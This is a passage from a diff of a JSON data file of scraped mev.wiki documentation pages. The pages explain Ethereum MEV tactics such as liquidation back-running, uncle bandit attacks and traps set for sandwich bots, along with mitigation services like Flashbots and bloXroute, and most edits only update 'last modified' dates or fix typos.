can engage and bid on the collateral price. Previous Back-running Next Time bandit attack Last modified 1yr ago", + "body": "Liquidations How are liquidations exploited? Back-running strategies also apply to liquidations whereby a transaction sender wishes to be the first to liquidate a loan right after a price oracle update (which will allow liquidation to be triggered). Fixed spread liquidation used by Compound, Aave, and dYdX allows a liquidator to purchase collateral at a fixed discount when repaying debt. Strategy 1 Strategy 2 A detects a liquidation opportunity at block B (i.e., after the execution of B). A then issues a liquidation transaction T, which is expected to be mined in the next block B+1. A attempts to destructively front-run other competing liquidators by setting high transaction fees for his liquidation transaction T. A observes a transaction T, which will create a liquidation opportunity (e.g., an oracle price update transaction which will render a collateralized debt liquidatable). A then back-runs T with a liquidation transaction TA to avoid the transaction fee bidding competition. The auction liquidation allows a liquidator to start an auction that lasts for a pre-configured period (e.g., 6 hours). 
Competing liquidators can engage and bid on the collateral price. Previous Back-running Next Time bandit attack Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Uncle bandit attack", "html_url": "https://www.mev.wiki/attack-examples/uncle-bandit-attack", - "body": "Uncle bandit attack What is an uncle bandit attack? Bundles are groups of transactions Flashbots users submit. Those transactions must be included in the order submitted, and either the whole bundle is included, or nothing is. A bundle should never be split up. Robert Miller found that for a specific bundle, only the \"Buy\" part of a sandwich bundle submitted had landed on-chain, and right after that Buy someone else had inserted a 7 gas transaction that arbitraged it. How? In Ethereum occasionally two blocks are mined at roughly the same time, and only one block can be added to the chain. The other gets \"uncled\" or orphaned. Anyone can access transactions in an uncled block and some of the transactions may not have ended up in the non-uncled block. In a way some transactions end up in a sort of mempool-like state: they are now public as a part of the uncled block and perhaps still valid too. A Sandwicher's bundle was included in an uncled block. An attacker saw this, grabbed only the Buy part of the Sandwich, threw away the rest, and added an arbitrage after. The attacker then submitted that as a bundle, which was then mined. Instead of seeing something late in time and rewinding it (time-bandit attack), the uncle bandit attack is when an attacker sees something in an uncle and brings it forward. This also shows that attacks extend beyond the mempool and into uncled blocks as well. https://twitter.com/bertcmiller/status/1382673587715342339?s=20 Previous Time bandit attack Next Attempts to trick the bots Last modified 1yr ago", + "body": "Uncle bandit attack What is an uncle bandit attack? Bundles are groups of transactions Flashbots users submit. Those transactions must be included in the order submitted, and either the whole bundle is included, or nothing is. A bundle should never be split up. Robert Miller found that for a specific bundle, only the \"Buy\" part of a sandwich bundle submitted had landed on-chain, and right after that Buy someone else had inserted a 7 gas transaction that arbitraged it. How? In Ethereum occasionally two blocks are mined at roughly the same time, and only one block can be added to the chain. The other gets \"uncled\" or orphaned. Anyone can access transactions in an uncled block and some of the transactions may not have ended up in the non-uncled block. In a way some transactions end up in a sort of mempool-like state: they are now public as a part of the uncled block and perhaps still valid too. A Sandwicher's bundle was included in an uncled block. An attacker saw this, grabbed only the Buy part of the Sandwich, threw away the rest, and added an arbitrage after. The attacker then submitted that as a bundle, which was then mined. Instead of seeing something late in time and rewinding it (time-bandit attack), the uncle bandit attack is when an attacker sees something in an uncle and brings it forward. This also shows that attacks extend beyond the mempool and into uncled blocks as well. 
https://twitter.com/bertcmiller/status/1382673587715342339?s=20 Previous Time bandit attack Next Attempts to trick the bots Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Kattana", "html_url": "https://www.mev.wiki/attempts-to-trick-the-bots/kattana", - "body": "Kattana What is Kattana? The Kattana team included a trap for front-running bots during their token listing. There is a line in the code that disallows the front-runner from selling all tokens. So a front-runner paid 68 ETH to the miner and ended up with tokens he wasn't able to sell. Link: https://twitter.com/SiegeRhino2/status/1381035640989626369?s=20 Previous Salmonella Next Other attempts Last modified 1yr ago", + "body": "Kattana What is Kattana? The Kattana team included a trap for front-running bots during their token listing. There is a line in the code that disallows the front-runner from selling all tokens. So a front-runner paid 68 ETH to the miner and ended up with tokens he wasn't able to sell. Link: https://twitter.com/SiegeRhino2/status/1381035640989626369?s=20 Previous Salmonella Next Other attempts Last modified 2yr ago", "labels": [ "Documentation" ] }, { "title": "Other attempts", "html_url": "https://www.mev.wiki/attempts-to-trick-the-bots/other-attempts-to-trick-the-bot", - "body": "Other attempts What are the other attempts to trick the bot? Link: https://twitter.com/bertcmiller/status/1381296074086830091?s=20 Background Instead of users paying transaction fees via gas prices, Flashbots users pay fees via a smart contract call which transfers ETH to a miner. Miners receive bundles of transactions from users and include the bundle that pays them the most. Users love this because they only pay for transactions that are included and they can determine the fee that they are going to pay. Sandwich bots watch the mempool for users buying on DEXes and sandwich them: running the price up before the victim buys and dumping after for a profit. Those 3 txs (buy, victim transaction, sell) make up a bundle. Note the Sandwich sell transaction contains the smart contract payment to the miner. It's important that payment goes to the miner on the sell transaction! That should only happen after the bot has secured profit from selling the tokens bought in their front-run. If that sell fails then there is no payment to the miner, and thus their bundle shouldn't be included. To be even more secure, bots will simulate their transactions on local infrastructure. Bots won't send transactions unless the simulation goes well. Paying transaction fees only on the sell transaction of a sandwich should defend against this. No profit, no payment. Simulation vs Reality Some really smart people found weaknesses among all of these defenses. The first defense was broken by an ERC20 transfer function that checked to see if the block was mined by Flashbots' miners, and if so transferred way less out. Local simulations look fine but do not work in production. The second defense - Payment only on a sell transaction Again: Sandwich bots make miner payment conditional on profit. That was broken by making the ERC20 token pay the miner. Thus even with the Sandwich bot sell failing, the miner would still get paid! Here's what actually happened: Sandwich bot gets baited and buys 100 ETH of the poisonous token. Poisonous token owner's bait triggers custom transfer function, which pays 0.1 ETH to the miner. Sandwich bot's sell doesn't work because of the poisonous token. 
As the sandwich bot submitted these three transactions in a bundle, all three were included: the successful buy, the bait, and the failed sell. The poisonous ERC20's payment via the custom transfer was what incentivized a miner to include it! It is estimated that the first person to do this made about 100 ETH. You can see the poisoned ERC20 Uniswap transactions here . From Victim to Predator One of their victims was one of the most successful Flashbots bot operators, and they immediately sprung into action. In a short period of time the victim turned into an apex predator. They launched a similar but slightly different ERC20 (YOLOchain), and ended up successfully baiting many more sandwichers. They made 300 ETH doing so! Previous Kattana Next Solutions Last modified 1yr ago", + "body": "Other attempts What are the other attempts to trick the bot? Link: https://twitter.com/bertcmiller/status/1381296074086830091?s=20 Background Instead of users paying transaction fees via gas prices, Flashbots users pay fees via a smart contract call which transfers ETH to a miner. Miners receive bundles of transactions from users and include the bundle that pays them the most. Users love this because they only pay for transactions that are included and they can determine the fee that they are going to pay. Sandwich bots watch the mempool for users buying on DEXes and sandwich them: running the price up before the victim buys and dumping after for a profit. Those 3 txs (buy, victim transaction, sell) make up a bundle. Note the Sandwich sell transaction contains the smart contract payment to the miner. It's important that payment goes to the miner on the sell transaction! That should only happen after the bot has secured profit from selling the tokens bought in their front-run. If that sell fails then there is no payment to the miner, and thus their bundle shouldn't be included. To be even more secure, bots will simulate their transactions on local infrastructure. Bots won't send transactions unless the simulation goes well. Paying transaction fees only on the sell transaction of a sandwich should defend against this. No profit, no payment. Simulation vs Reality Some really smart people found weaknesses among all of these defenses. The first defense was broken by an ERC20 transfer function that checked to see if the block was mined by Flashbots' miners, and if so transferred way less out. Local simulations look fine but do not work in production. The second defense - Payment only on a sell transaction Again: Sandwich bots make miner payment conditional on profit. That was broken by making the ERC20 token pay the miner. Thus even with the Sandwich bot sell failing, the miner would still get paid! Here's what actually happened: Sandwich bot gets baited and buys 100 ETH of the poisonous token. Poisonous token owner's bait triggers custom transfer function, which pays 0.1 ETH to the miner. Sandwich bot's sell doesn't work because of the poisonous token. As the sandwich bot submitted these three transactions in a bundle, all three were included: the successful buy, the bait, and the failed sell. The poisonous ERC20's payment via the custom transfer was what incentivized a miner to include it! It is estimated that the first person to do this made about 100 ETH. You can see the poisoned ERC20 Uniswap transactions here . From Victim to Predator One of their victims was one of the most successful Flashbots bot operators, and they immediately sprung into action. 
In a short period of time the victim turned into an apex predator. They launched a similar but slightly different ERC20 (YOLOchain), and ended up successfully baiting many more sandwichers. They made 300 ETH doing so! Previous Kattana Next Solutions Last modified 2yr ago", "labels": [ "Documentation" ] @@ -570,7 +570,7 @@ { "title": "Salmonella", "html_url": "https://www.mev.wiki/attempts-to-trick-the-bots/salmonella", - "body": "Salmonella What is Salmonella? Salmonella intentionally exploits the generalised nature of front-running setups. The goal of sandwich trading is to exploit the slippage of unintended victims, so this strategy turns the tables on the exploiters. Its a regular ERC20 token, which behaves exactly like any other ERC20 token in normal use-cases. However, it has some special logic to detect when anyone other than the specified owner is transacting it, and in these situations it only returns 10% of the specified amount - despite emitting event logs which match a trade of the full amount. Link: https://github.com/Defi-Cartel/salmonella Previous Attempts to trick the bots Next Kattana Last modified 1yr ago", + "body": "Salmonella What is Salmonella? Salmonella intentionally exploits the generalised nature of front-running setups. The goal of sandwich trading is to exploit the slippage of unintended victims, so this strategy turns the tables on the exploiters. Its a regular ERC20 token, which behaves exactly like any other ERC20 token in normal use-cases. However, it has some special logic to detect when anyone other than the specified owner is transacting it, and in these situations it only returns 10% of the specified amount - despite emitting event logs which match a trade of the full amount. Link: https://github.com/Defi-Cartel/salmonella Previous Attempts to trick the bots Next Kattana Last modified 2yr ago", "labels": [ "Documentation" ] @@ -578,7 +578,7 @@ { "title": "Front-running as a Service (FaaS) or MEV Auctions (MEVA)", "html_url": "https://www.mev.wiki/solutions/faas-or-meva", - "body": "Front-running as a Service (FaaS) or MEV Auctions (MEVA) MEVA and FaaS solutions. In a FaaS or MEVA system, MEV is extracted in a variety of ways such as miners auctioning off the right to front-run users. 'Centralizing MEV extraction is good because it quarantines a revenue stream that could otherwise drive centralization in other sectors.' Vitalik Buterin 'In this article, Im going to go deep into my personal arguments for why extracting MEV in cryptocurrencies isnt like theft, why it is a critical metric for network security in any distributed system secured by economic incentives (yes, including centralized ones), and what we should do about MEV in the next 3-5 years as a community.' Phil Daian, co-author of Flash Boys 2.0 See the various solutions: Private Transactions BackRunMe by bloXroute Flashbots mistX by alchemist KeeperDAO EDEN Network (ArcherSwap) Optimism MiningDAO BackBone Cabal Previous Solutions Next Private Transactions Last modified 1yr ago", + "body": "Front-running as a Service (FaaS) or MEV Auctions (MEVA) MEVA and FaaS solutions. In a FaaS or MEVA system, MEV is extracted in a variety of ways such as miners auctioning off the right to front-run users. 'Centralizing MEV extraction is good because it quarantines a revenue stream that could otherwise drive centralization in other sectors.' 
Vitalik Buterin 'In this article, I'm going to go deep into my personal arguments for why extracting MEV in cryptocurrencies isn't like theft, why it is a critical metric for network security in any distributed system secured by economic incentives (yes, including centralized ones), and what we should do about MEV in the next 3-5 years as a community.' Phil Daian, co-author of Flash Boys 2.0 See the various solutions: Private Transactions BackRunMe by bloXroute Flashbots mistX by alchemist KeeperDAO EDEN Network (ArcherSwap) Optimism MiningDAO BackBone Cabal Previous Solutions Next Private Transactions Last modified 2yr ago", "labels": [ "Documentation" ] @@ -586,7 +586,7 @@ { "title": "MEV Minimization", "html_url": "https://www.mev.wiki/solutions/mev-minimization", - "body": "MEV Minimization MEV minimization and prevention solutions. Here are various solutions in MEV minimization: Conveyor (Automata Network) SecretSwap (Secret Network) Fair sequencing service (Chainlink) Arbitrum (Offchain Labs) Vega protocol CowSwap Veedo (StarkWare) LibSubmarine Sikka Shutter Network Previous BackBone Cabal Next Conveyor (Automata Network) Last modified 1yr ago", + "body": "MEV Minimization MEV minimization and prevention solutions. Here are various solutions in MEV minimization: Conveyor (Automata Network) SecretSwap (Secret Network) Fair sequencing service (Chainlink) Arbitrum (Offchain Labs) Vega protocol CowSwap Veedo (StarkWare) LibSubmarine Sikka Shutter Network Previous BackBone Cabal Next Conveyor (Automata Network) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -594,7 +594,7 @@ { "title": "Other solutions", "html_url": "https://www.mev.wiki/solutions/others", - "body": "Other solutions Other ways to tackle MEV. Here are the list of other solutions: B.Protocol Previous Shutter Network Next B.Protocol Last modified 1yr ago", + "body": "Other solutions Other ways to tackle MEV. Here is the list of other solutions: B.Protocol Previous Shutter Network Next B.Protocol Last modified 2yr ago", "labels": [ "Documentation" ] @@ -610,7 +610,7 @@ { "title": "Automated Market Maker", "html_url": "https://www.mev.wiki/terms-and-concepts/automated-market-maker", - "body": "Automated Market Maker What is an AMM? A type of Decentralised Exchange. Contrary to traditional limit order-book-based exchanges (which maintain a list of bids and asks for an asset pair), AMM exchanges maintain a pool of capital (a liquidity pool) with at least two assets. A smart contract governs the rules by which traders can purchase and sell assets from the liquidity pool. The most common AMM mechanism is a constant product AMM, where the product of an asset X and asset Y in a pool have to abide by a constant K. Examples of AMM Exchanges include Uniswap , Sushiswap , Balancer . Previous DeFi Next Arbitrage Last modified 1yr ago", + "body": "Automated Market Maker What is an AMM? A type of Decentralised Exchange. Contrary to traditional limit order-book-based exchanges (which maintain a list of bids and asks for an asset pair), AMM exchanges maintain a pool of capital (a liquidity pool) with at least two assets. A smart contract governs the rules by which traders can purchase and sell assets from the liquidity pool. The most common AMM mechanism is a constant product AMM, where the product of an asset X and asset Y in a pool has to abide by a constant K. Examples of AMM Exchanges include Uniswap , Sushiswap , Balancer .
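The constant-product rule quoted in the Automated Market Maker entry above (X * Y = K) is compact enough to work through in code. Below is a minimal Python sketch; the pool sizes and the Uniswap-style 0.3% fee are illustrative assumptions, not parameters of any particular exchange.

```python
# Minimal sketch of a constant-product AMM swap (x * y = k), as described
# in the Automated Market Maker entry above. The pool sizes and the 0.3%
# fee are illustrative assumptions, not any specific exchange's values.

def get_amount_out(amount_in: float, reserve_in: float, reserve_out: float,
                   fee: float = 0.003) -> float:
    """Output amount received, keeping reserve_in * reserve_out constant."""
    amount_in_after_fee = amount_in * (1 - fee)
    new_reserve_in = reserve_in + amount_in_after_fee
    # Solve (x + dx) * (y - dy) = x * y for dy.
    k = reserve_in * reserve_out
    new_reserve_out = k / new_reserve_in
    return reserve_out - new_reserve_out

# Example: pool holding 1,000 X and 1,000,000 Y (spot price 1 X = 1,000 Y).
print(get_amount_out(10, 1_000, 1_000_000))  # ~9,872 Y rather than 10,000 Y
```

The roughly 1.3% shortfall versus the spot price in this example is exactly the slippage that the sandwich bots described elsewhere in this document exploit.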
Previous DeFi Next Arbitrage Last modified 2yr ago", "labels": [ "Documentation" ] @@ -618,7 +618,7 @@ { "title": "DeFi", "html_url": "https://www.mev.wiki/terms-and-concepts/defi", - "body": "DeFi What is DeFi? DeFi is a subset of finance-focused decentralized protocols that operate autonomously on blockchain-based smart contracts. The total value locked in DeFi amounts to >$50B USD . Link: https://defipulse.com/ Previous Terms and Concepts Next Automated Market Maker Last modified 1yr ago", + "body": "DeFi What is DeFi? DeFi is a subset of finance-focused decentralized protocols that operate autonomously on blockchain-based smart contracts. The total value locked in DeFi amounts to >$50B USD . Link: https://defipulse.com/ Previous Terms and Concepts Next Automated Market Maker Last modified 2yr ago", "labels": [ "Documentation" ] @@ -674,7 +674,7 @@ { "title": "BackBone Cabal", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/backbone-cabal", - "body": "BackBone Cabal BackBone Cabal BackBone Cabal is a strategy that aims to extract MEV from SushiSwap. Profits are redistributed back to users who submitted trades in the first place in the form of eliminating their transaction cost (up to 90%). YCabal creates a virtualized mempool (i.e. a MEV-relay network) that aggregates transactions (batching). Users are able to opt in and send transactions to YCabal and in return for not having to pay for gas for their transaction, YCabal batch processes it and takes the arbitrage profit. Risk by inventory price risk is carried by a Vault, where Vault depositers are returned the profit the YCabal realizes. Links: Website: https://backbonecabal.com/ Knowledge Base: https://backbone-kb.netlify.app/ SushiSwap Proposal: https://forum.sushiswapclassic.org/t/proposal-ycabal-mev-strategy/3159 Previous MiningDAO Next MEV Minimization Last modified 1yr ago", + "body": "BackBone Cabal BackBone Cabal BackBone Cabal is a strategy that aims to extract MEV from SushiSwap. Profits are redistributed back to users who submitted trades in the first place in the form of eliminating their transaction cost (up to 90%). YCabal creates a virtualized mempool (i.e. a MEV-relay network) that aggregates transactions (batching). Users are able to opt in and send transactions to YCabal and in return for not having to pay for gas for their transaction, YCabal batch processes it and takes the arbitrage profit. Inventory price risk is carried by a Vault, where Vault depositors are returned the profit the YCabal realizes. Links: Website: https://backbonecabal.com/ Knowledge Base: https://backbone-kb.netlify.app/ SushiSwap Proposal: https://forum.sushiswapclassic.org/t/proposal-ycabal-mev-strategy/3159 Previous MiningDAO Next MEV Minimization Last modified 2yr ago", "labels": [ "Documentation" ] @@ -682,7 +682,7 @@ { "title": "BackRunMe by bloXroute", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/backrunme-by-bloxroute", - "body": "BackRunMe by bloXroute BackRunMe by bloXroute BackRunMe is a service that allows users to submit private transactions (e.g. protection against frontrunning and sandwich attacks) while allowing searchers to backrun the transaction via MEV IF it produces an arbitrage profit. If it doesn't generate an arbitrage profit it is processed as a regular private transaction. BackRunMe, gives a portion of this additional profit back to the user. How BackRunMe works. The profit sharing ratio is as follows: 50% to miners, 25% to users, 20%to searchers and 5% to bloXroute.
Users can use MetaMask directly on BackRunMe to trade on Uniswap or Sushiswap. Links: https://backrunme.com/#/swap https://medium.com/bloxroute/there-is-light-in-the-dark-forest-2d7b77f4ca2d Previous Private Transactions Next Flashbots Last modified 1yr ago", + "body": "BackRunMe by bloXroute BackRunMe by bloXroute BackRunMe is a service that allows users to submit private transactions (e.g. protection against frontrunning and sandwich attacks) while allowing searchers to backrun the transaction via MEV IF it produces an arbitrage profit. If it doesn't generate an arbitrage profit, it is processed as a regular private transaction. BackRunMe gives a portion of this additional profit back to the user. How BackRunMe works. The profit sharing ratio is as follows: 50% to miners, 25% to users, 20% to searchers and 5% to bloXroute. Users can use MetaMask directly on BackRunMe to trade on Uniswap or Sushiswap. Links: https://backrunme.com/#/swap https://medium.com/bloxroute/there-is-light-in-the-dark-forest-2d7b77f4ca2d Previous Private Transactions Next Flashbots Last modified 2yr ago", "labels": [ "Documentation" ] @@ -690,7 +690,7 @@ { "title": "Flashbots", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/flashbots", - "body": "Flashbots Flashbots Flashbots is a research and development organization formed to mitigate the negative externalities and existential risks posed by MEV. They aim to Democratize MEV Extraction through MEV-Geth, which enables a sealed-bid block space auction mechanism for communicating transaction order preference. ELI5 Link: https://twitter.com/_silto_/status/1381292907567722498 Flashbots created an ETH node for miners, that not only watches the mempool like any other node, but also connects to a relayer (a server) operated by Flashbots. This MEV-Relay is a kind of parallel channel that directly connects miners to bots that want their transactions included. The transactions that the bots want to include are sent through the MEV-Relay as bundles containing: the transactions to execute a tip to the miner, coming as an ETH transfer These transactions use a 0 gwei gas price, as the payment to the miner is included in the transaction itself as the tip. Since these transactions are sent through a parallel private relay, it reduces the mempool bidding war, failed transactions bloating the blockchain, and overall gas cost for users. Links: GitHub: https://github.com/flashbots Research: https://github.com/flashbots/mev-research Monthly Meetings: https://github.com/flashbots/pm API: https://blocks.flashbots.net/ Discord: https://discord.gg/7hvTycdNcK Medium: https://medium.com/flashbots https://medium.com/flashbots/frontrunning-the-mev-crisis-40629a613752 https://medium.com/flashbots/quantifying-mev-introducing-mev-explore-v0-5ccbee0f6d02 https://ethresear.ch/t/flashbots-frontrunning-the-mev-crisis/8251 Previous BackRunMe by bloXroute Next mistX by alchemist Last modified 1yr ago", + "body": "Flashbots Flashbots Flashbots is a research and development organization formed to mitigate the negative externalities and existential risks posed by MEV. They aim to Democratize MEV Extraction through MEV-Geth, which enables a sealed-bid block space auction mechanism for communicating transaction order preference. ELI5 Link: https://twitter.com/_silto_/status/1381292907567722498 Flashbots created an ETH node for miners that not only watches the mempool like any other node, but also connects to a relayer (a server) operated by Flashbots.
This MEV-Relay is a kind of parallel channel that directly connects miners to bots that want their transactions included. The transactions that the bots want to include are sent through the MEV-Relay as bundles containing: the transactions to execute, and a tip to the miner coming as an ETH transfer. These transactions use a 0 gwei gas price, as the payment to the miner is included in the transaction itself as the tip. Since these transactions are sent through a parallel private relay, it reduces the mempool bidding war, failed transactions bloating the blockchain, and overall gas cost for users. Links: GitHub: https://github.com/flashbots Research: https://github.com/flashbots/mev-research Monthly Meetings: https://github.com/flashbots/pm API: https://blocks.flashbots.net/ Discord: https://discord.gg/7hvTycdNcK Medium: https://medium.com/flashbots https://medium.com/flashbots/frontrunning-the-mev-crisis-40629a613752 https://medium.com/flashbots/quantifying-mev-introducing-mev-explore-v0-5ccbee0f6d02 https://ethresear.ch/t/flashbots-frontrunning-the-mev-crisis/8251 Previous BackRunMe by bloXroute Next mistX by alchemist Last modified 2yr ago", "labels": [ "Documentation" ] @@ -698,7 +698,7 @@ { "title": "KeeperDAO", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/keeperdao", - "body": "KeeperDAO KeeperDAO KeeperDAO is similar to a mining pool for Keepers. By incentivizing a game theory optimal strategy for cooperation among on-chain arbitrageurs, KeeperDAO provides an efficient mechanism for large scale arbitrage and liquidation trades on all DeFi protocols. The Hiding Game One of the 3 games that has been built. The Hiding Game refers to the cooperation between users and keepers to hide MEV by wrapping trades/debt in specialised on-chain contracts. These contracts restrict profit extracting opportunities to KeeperDAO itself. Here's the ELI5 Users route their trades and loans through KeeperDAO, which attempts to extract any arbitrage or liquidation profit available. Those profits are returned back to the user in $ROOK tokens, and profits go into a pool controlled by $ROOK holders. By giving KeeperDAO priority access to arbitrage and liquidations, the Hiding Game maximizes the profits available from these opportunities. kCompound (Phase 2 of the Hiding Game) kCompound is the second phase of the Hiding Game. KeeperDAO posts collateral to save your position from being publicly liquidated. Instead, you get privately liquidated. KeeperDAO keeper will then find the best price for your collateral, targeting a 5% profit margin. This profit will then be split between you, the keeper, and the KeeperDAO treasury, meaning that kCompound borrowers will receive a portion of the profits from their own liquidation. Links: Website: https://keeperdao.com/#/ Wiki: https://github.com/keeperdao/docs/wiki kCompound: https://medium.com/keeperdao/introducing-kcompound-a23511c847a0 Previous mistX by alchemist Next EDEN Network (ArcherSwap) Last modified 1yr ago", + "body": "KeeperDAO KeeperDAO KeeperDAO is similar to a mining pool for Keepers. By incentivizing a game theory optimal strategy for cooperation among on-chain arbitrageurs, KeeperDAO provides an efficient mechanism for large scale arbitrage and liquidation trades on all DeFi protocols. The Hiding Game One of the 3 games that has been built. The Hiding Game refers to the cooperation between users and keepers to hide MEV by wrapping trades/debt in specialised on-chain contracts.
These contracts restrict profit extracting opportunities to KeeperDAO itself. Here's the ELI5 Users route their trades and loans through KeeperDAO, which attempts to extract any arbitrage or liquidation profit available. Those profits are returned back to the user in $ROOK tokens, and profits go into a pool controlled by $ROOK holders. By giving KeeperDAO priority access to arbitrage and liquidations, the Hiding Game maximizes the profits available from these opportunities. kCompound (Phase 2 of the Hiding Game) kCompound is the second phase of the Hiding Game. KeeperDAO posts collateral to save your position from being publicly liquidated. Instead, you get privately liquidated. KeeperDAO keeper will then find the best price for your collateral, targeting a 5% profit margin. This profit will then be split between you, the keeper, and the KeeperDAO treasury, meaning that kCompound borrowers will receive a portion of the profits from their own liquidation. Links: Website: https://keeperdao.com/#/ Wiki: https://github.com/keeperdao/docs/wiki kCompound: https://medium.com/keeperdao/introducing-kcompound-a23511c847a0 Previous mistX by alchemist Next EDEN Network (ArcherSwap) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -706,7 +706,7 @@ { "title": "MiningDAO", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/miningdao", - "body": "MiningDAO MiningDAO MiningDAO is building a decentralized and transparent protocol for block formation that aims to pass 100% of MEV to miners. Anyone with an Ethereum address can propose the next block to be mined (via a block sealhash), and attach a bounty for successfully mining it. The mining pools would then mine on the highest-bounty proposal. One is for searchers to submit Flashbots-compatible bundles. The other is the Archer Relay Network (powers Archerswap) where users can submit private transactions and be protected from malicious MEV. Links: Website: https://miningdao.io Medium: https://medium.com/mining-dao/introducing-miningdao-1e469626f7ad Previous Optimism Next BackBone Cabal Last modified 1yr ago", + "body": "MiningDAO MiningDAO MiningDAO is building a decentralized and transparent protocol for block formation that aims to pass 100% of MEV to miners. Anyone with an Ethereum address can propose the next block to be mined (via a block sealhash), and attach a bounty for successfully mining it. The mining pools would then mine on the highest-bounty proposal. One is for searchers to submit Flashbots-compatible bundles. The other is the Archer Relay Network (powers Archerswap) where users can submit private transactions and be protected from malicious MEV. Links: Website: https://miningdao.io Medium: https://medium.com/mining-dao/introducing-miningdao-1e469626f7ad Previous Optimism Next BackBone Cabal Last modified 2yr ago", "labels": [ "Documentation" ] @@ -714,7 +714,7 @@ { "title": "mistX by alchemist", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/mistx-by-alchemist", - "body": "mistX by alchemist MistX by alchemist mistX is a DEX that enables end users to send transactions through Flashbots bundles. All transactions are gasless. However, instead of paying gas to the miners mistX users pay miners a bribe/tip in ETH. The tip is either included in the trade or comes from the user's wallet. The exchange utilises Flashbots and as such transactions processed via mistX do not publish user transaction information to a public mempool, but instead bundle transactions together. 
This hides the information from front-runners and thus prevents transactions from being manipulated, front-run, or sandwiched. Link: https://app.mistx.io/#/exchange Previous Flashbots Next KeeperDAO Last modified 1yr ago", + "body": "mistX by alchemist MistX by alchemist mistX is a DEX that enables end users to send transactions through Flashbots bundles. All transactions are gasless. However, instead of paying gas to the miners mistX users pay miners a bribe/tip in ETH. The tip is either included in the trade or comes from the user's wallet. The exchange utilises Flashbots and as such transactions processed via mistX do not publish user transaction information to a public mempool, but instead bundle transactions together. This hides the information from front-runners and thus prevents transactions from being manipulated, front-run, or sandwiched. Link: https://app.mistx.io/#/exchange Previous Flashbots Next KeeperDAO Last modified 2yr ago", "labels": [ "Documentation" ] @@ -722,7 +722,7 @@ { "title": "Optimism", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/optimism", - "body": "Optimism Optimism Optimism are the original proposers of MEVA. MEV Auction (MEVA) is created in which the winner of the auction has the right to reorder submitted transactions and insert their own, as long as they do not delay any specific transaction by more than N blocks. MEVA on Ethereum Implementing the Auction The auction is able to extract MEV from miners by separating two functions 1) Transaction inclusion; and 2) transaction ordering. In order to implement MEVA roles are defined. Block producers determine transaction inclusion, and Sequencers determine transaction ordering. Block producers - Transaction Inclusion Block proposers are most analogous to traditional blockchain miners. Instead of proposing blocks with an ordering, they simply propose a set of transactions to eventually be included before N blocks. Sequencers - Transaction Ordering Sequencers are elected by a smart contract managed auction run by the block producers called the MEVA contract. This auction assigns the right to sequence the last N transactions. If, within a timeout the sequencer has not submitted an ordering which is included by block proposers, a new sequencer is elected. Implementation on Layer 2 It is possible to enshrine this MEVA contract directly on layer 1 (L1) blockchain consensus protocols. However, it is also possible to non-invasively add this mechanism in layer 2 (L2) and use it to manage Optimistic Rollup transactio ordering. In L2, L1 miners are repurposed and utilized as block proposers. MEVA contract is implemented and designated a single sequencer at a time. Links: https://optimism.io/ https://ethresear.ch/t/mev-auction-auctioning-transaction-ordering-rights-as-a-solution-to-miner-extractable-value/6788 https://docs.google.com/presentation/d/1RaF1byflrLF3yUjd-5vXDZB1ZIRofVeK3JYVD6NPr30/edit#slide=id.gc9bdacc472_0_96 Previous EDEN Network (ArcherSwap) Next MiningDAO Last modified 1yr ago", + "body": "Optimism Optimism Optimism are the original proposers of MEVA. MEV Auction (MEVA) is created in which the winner of the auction has the right to reorder submitted transactions and insert their own, as long as they do not delay any specific transaction by more than N blocks. MEVA on Ethereum Implementing the Auction The auction is able to extract MEV from miners by separating two functions 1) Transaction inclusion; and 2) transaction ordering. In order to implement MEVA roles are defined. 
Block producers determine transaction inclusion, and Sequencers determine transaction ordering. Block producers - Transaction Inclusion Block proposers are most analogous to traditional blockchain miners. Instead of proposing blocks with an ordering, they simply propose a set of transactions to eventually be included before N blocks. Sequencers - Transaction Ordering Sequencers are elected by a smart contract managed auction run by the block producers called the MEVA contract. This auction assigns the right to sequence the last N transactions. If, within a timeout, the sequencer has not submitted an ordering which is included by block proposers, a new sequencer is elected. Implementation on Layer 2 It is possible to enshrine this MEVA contract directly on layer 1 (L1) blockchain consensus protocols. However, it is also possible to non-invasively add this mechanism in layer 2 (L2) and use it to manage Optimistic Rollup transaction ordering. In L2, L1 miners are repurposed and utilized as block proposers. The MEVA contract is implemented and designates a single sequencer at a time. Links: https://optimism.io/ https://ethresear.ch/t/mev-auction-auctioning-transaction-ordering-rights-as-a-solution-to-miner-extractable-value/6788 https://docs.google.com/presentation/d/1RaF1byflrLF3yUjd-5vXDZB1ZIRofVeK3JYVD6NPr30/edit#slide=id.gc9bdacc472_0_96 Previous EDEN Network (ArcherSwap) Next MiningDAO Last modified 2yr ago", "labels": [ "Documentation" ] @@ -730,7 +730,7 @@ { "title": "Private Transactions", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/private-transactions", - "body": "Private Transactions Private Transactions Typically, transactions are broadcast to the mempool where they remain pending until miners pick them and add to the block. Private transactions however, are only visible to the pool and are not broadcast to other nodes (pay more for faster transactions). Examples include 1inch Exchange's Stealth Transactions , Taichi Network and BloXroute . Taichi Network allows users to send private transactions directly to Sparkpool, bypassing the public mempool. Private Transactions offered by Taichi Network bloXroute Labs has a wide range of offerings and their core competency is low global latency for DeFi (8% of blocks mined within 1 sec). For the other side of the coin, here is bloXroute Labs' take on why private mempools are not necessarily bad : 1. Front-runners don't need these services to outpace regular users, who are slower by seconds. They need it to outpace one another, where improving speed 0.8->0.15 sec matters. 2. When a transaction is privately sent to pools other frontrunners can't attempt to front-run it. This helps avoid fierce escalation of fees. Link: https://docs.bloxroute.com/apis/frontrunning-protection Previous Front-running as a Service (FaaS) or MEV Auctions (MEVA) Next BackRunMe by bloXroute Last modified 1yr ago", + "body": "Private Transactions Private Transactions Typically, transactions are broadcast to the mempool where they remain pending until miners pick them and add to the block. Private transactions however, are only visible to the pool and are not broadcast to other nodes (pay more for faster transactions). Examples include 1inch Exchange's Stealth Transactions , Taichi Network and BloXroute . Taichi Network allows users to send private transactions directly to Sparkpool, bypassing the public mempool.
